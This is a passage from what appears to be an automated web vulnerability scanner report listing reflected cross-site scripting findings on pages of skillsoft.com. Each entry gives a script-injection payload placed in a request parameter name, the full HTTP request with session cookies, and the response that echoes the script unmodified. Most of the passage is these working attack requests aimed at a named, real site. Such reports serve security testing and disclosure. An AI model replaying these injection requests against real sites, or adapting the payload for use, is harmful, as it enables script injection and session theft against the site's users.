HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49715
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/course_collections/compliance.asp?727c3"><script>alert(1)</script>11f582872a9=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.57. http://skillsoft.com/products/course_collections/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eada0"><script>alert(1)</script>9e73194187e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/course_collections/default.asp?eada0"><script>alert(1)</script>9e73194187e=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51680
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/course_collections/default.asp?eada0"><script>alert(1)</script>9e73194187e=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.58. http://skillsoft.com/products/course_collections/desktop_skills.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/desktop_skills.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b25"><script>alert(1)</script>6f44f8f09de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/course_collections/desktop_skills.asp?76b25"><script>alert(1)</script>6f44f8f09de=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49486
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:45:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/course_collections/desktop_skills.asp?76b25"><script>alert(1)</script>6f44f8f09de=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.59. http://skillsoft.com/products/course_collections/esh.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/esh.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0477"><script>alert(1)</script>870ebd02137 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/course_collections/esh.asp?f0477"><script>alert(1)</script>870ebd02137=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49458
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/course_collections/esh.asp?f0477"><script>alert(1)</script>870ebd02137=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.60. http://skillsoft.com/products/course_collections/legal.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/legal.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d54d8"><script>alert(1)</script>69f4805c1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/course_collections/legal.asp?d54d8"><script>alert(1)</script>69f4805c1f=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62419
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:45:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/course_collections/legal.asp?d54d8"><script>alert(1)</script>69f4805c1f=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.61. http://skillsoft.com/products/course_collections/skillsims.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/skillsims.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d1ae"><script>alert(1)</script>99fc7ac07d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/course_collections/skillsims.asp?9d1ae"><script>alert(1)</script>99fc7ac07d=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47898
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:47:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/course_collections/skillsims.asp?9d1ae"><script>alert(1)</script>99fc7ac07d=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.62. http://skillsoft.com/products/custom_content/SkillStudio.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/custom_content/SkillStudio.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77984"><script>alert(1)</script>bb2160d630c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/custom_content/SkillStudio.asp?77984"><script>alert(1)</script>bb2160d630c=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47293
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:47:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/custom_content/SkillStudio.asp?77984"><script>alert(1)</script>bb2160d630c=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.63. http://skillsoft.com/products/custom_content/custom_solutions.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/custom_content/custom_solutions.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8b2"><script>alert(1)</script>3ced22e4d1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/custom_content/custom_solutions.asp?ec8b2"><script>alert(1)</script>3ced22e4d1d=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47223
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:46:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/custom_content/custom_solutions.asp?ec8b2"><script>alert(1)</script>3ced22e4d1d=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.64. http://skillsoft.com/products/custom_content/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/custom_content/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da52b"><script>alert(1)</script>a3145bdd2f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/custom_content/default.asp?da52b"><script>alert(1)</script>a3145bdd2f7=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45347
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:46:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/custom_content/default.asp?da52b"><script>alert(1)</script>a3145bdd2f7=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.65. http://skillsoft.com/products/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b12"><script>alert(1)</script>04ca917af09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/default.asp?f9b12"><script>alert(1)</script>04ca917af09=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48763
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/default.asp?f9b12"><script>alert(1)</script>04ca917af09=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.66. http://skillsoft.com/products/inGenius/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/inGenius/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d21a3"><script>alert(1)</script>4e7978cd3b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/inGenius/default.asp?d21a3"><script>alert(1)</script>4e7978cd3b9=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48912
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:47:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/inGenius/default.asp?d21a3"><script>alert(1)</script>4e7978cd3b9=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.67. http://skillsoft.com/products/live_learning/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/live_learning/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3b6d"><script>alert(1)</script>df9325b99a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/live_learning/default.asp?d3b6d"><script>alert(1)</script>df9325b99a7=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51234
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:49:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/live_learning/default.asp?d3b6d"><script>alert(1)</script>df9325b99a7=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.68. http://skillsoft.com/products/live_learning/demos.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/live_learning/demos.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb31"><script>alert(1)</script>370c3e546ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/live_learning/demos.asp?6fb31"><script>alert(1)</script>370c3e546ab=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53350
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:49:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/live_learning/demos.asp?6fb31"><script>alert(1)</script>370c3e546ab=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.69. http://skillsoft.com/products/lms_integration.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/lms_integration.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea9b"><script>alert(1)</script>a6457a2e098 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/lms_integration.asp?6ea9b"><script>alert(1)</script>a6457a2e098=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51713
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/lms_integration.asp?6ea9b"><script>alert(1)</script>a6457a2e098=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.70. http://skillsoft.com/products/virtual_classroom/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/virtual_classroom/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23f8a"><script>alert(1)</script>54994a58df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/virtual_classroom/default.asp?23f8a"><script>alert(1)</script>54994a58df=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54892
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:47:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/virtual_classroom/default.asp?23f8a"><script>alert(1)</script>54994a58df=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.71. http://skillsoft.com/search.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /search.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad5dd"><script>alert(1)</script>25060319d0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.asp?ad5dd"><script>alert(1)</script>25060319d0f=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 32717
Content-Type: text/html
Expires: Mon, 03 Jan 2011 12:49:51 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/search.asp?ad5dd"><script>alert(1)</script>25060319d0f=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.72. http://skillsoft.com/sitemap.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /sitemap.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 645e3"><script>alert(1)</script>48088c218f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemap.asp?645e3"><script>alert(1)</script>48088c218f=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

